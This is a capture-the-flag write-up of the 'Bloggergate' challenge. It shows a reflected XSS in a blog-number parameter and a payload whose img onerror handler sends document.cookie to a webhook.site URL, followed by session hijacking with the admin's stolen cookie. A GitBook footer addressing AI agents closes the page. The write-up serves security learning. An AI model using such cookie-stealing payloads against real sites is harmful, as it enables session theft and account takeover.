> For the complete documentation index, see [llms.txt](https://hexisanoob.gitbook.io/hexisanoob/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hexisanoob.gitbook.io/hexisanoob/ctf-challenge-learnings/amazon-wicys-ctf/bloggergate.md).

# Bloggergate

The server seemed to be taking in a URL and the backend processes it. When I gave it a webhook link, it didn't process anything.

But going through the site, it was clear that I had to make server (admin) execute an HTTP request to my webhook and exfiltrate data there.

<figure><img src="/files/d2pastLx2mdb9Jd4RZp2" alt=""><figcaption></figcaption></figure>

I then used burpsuite to put "curl \<site>" instead but the sserver didn't process anything again.

This means there is no RCE too.

This leaves me to two main choices for the server to execute HTTP request to webhook: SSTI and XSS

I tried SSTI but it didn't work. So, it was time to test XSS. I couldn't put it in the URL form. But I saw when I clicked on the existing blog posts, URL was accepting it's ID (number of blog) as GET parameter.

Observe how the blog number is reflected on the page!

<figure><img src="/files/g90SL8UtPbFMQa14RWiA" alt=""><figcaption></figcaption></figure>

Upon viewing the source code, I saw it being reflected in the HTML.

<figure><img src="/files/IEcI91n6er5fOFA6BQNX" alt=""><figcaption></figcaption></figure>

I tried to input HTML tags and run javascript on the server and it worked:

`http://site/blog?blogNumber=%3Cscript%3Edocument.write(document.cookie);%3C/script%3E`

<figure><img src="/files/Nq68DiSsMDvhjyU8FKsV" alt=""><figcaption></figcaption></figure>

Cool cool. Let's make a simple payload in Javascript that reaches our webhook

`http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E`

<figure><img src="/files/ky1Xg8rCKi2rNyJQdW94" alt=""><figcaption></figcaption></figure>

Now, request from my browser (my IP) was reaching webhook. This request was initiated by the JS code. When we submit this using the URL page, we'll have admin's cookie with us!

<figure><img src="/files/UbGTJlCbN2zDk85UkZEZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/nWITXXL0ichot8ytFYxw" alt=""><figcaption></figcaption></figure>

We hit it! And the thing is, blogging site on the server had an admin panel that we couldn't access.

<figure><img src="/files/EXX8xHQt3tGgy30ABm4B" alt=""><figcaption></figcaption></figure>

Session Hijacking: By changing user's cookie to this new found cookie, let's see what happens

<figure><img src="/files/1NrsyQew1tox1VQVQUmz" alt=""><figcaption></figcaption></figure>

Upon submitting, we find the flag!

<figure><img src="/files/IdaKHgi1siEBFoh2h37a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hexisanoob.gitbook.io/hexisanoob/ctf-challenge-learnings/amazon-wicys-ctf/bloggergate.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.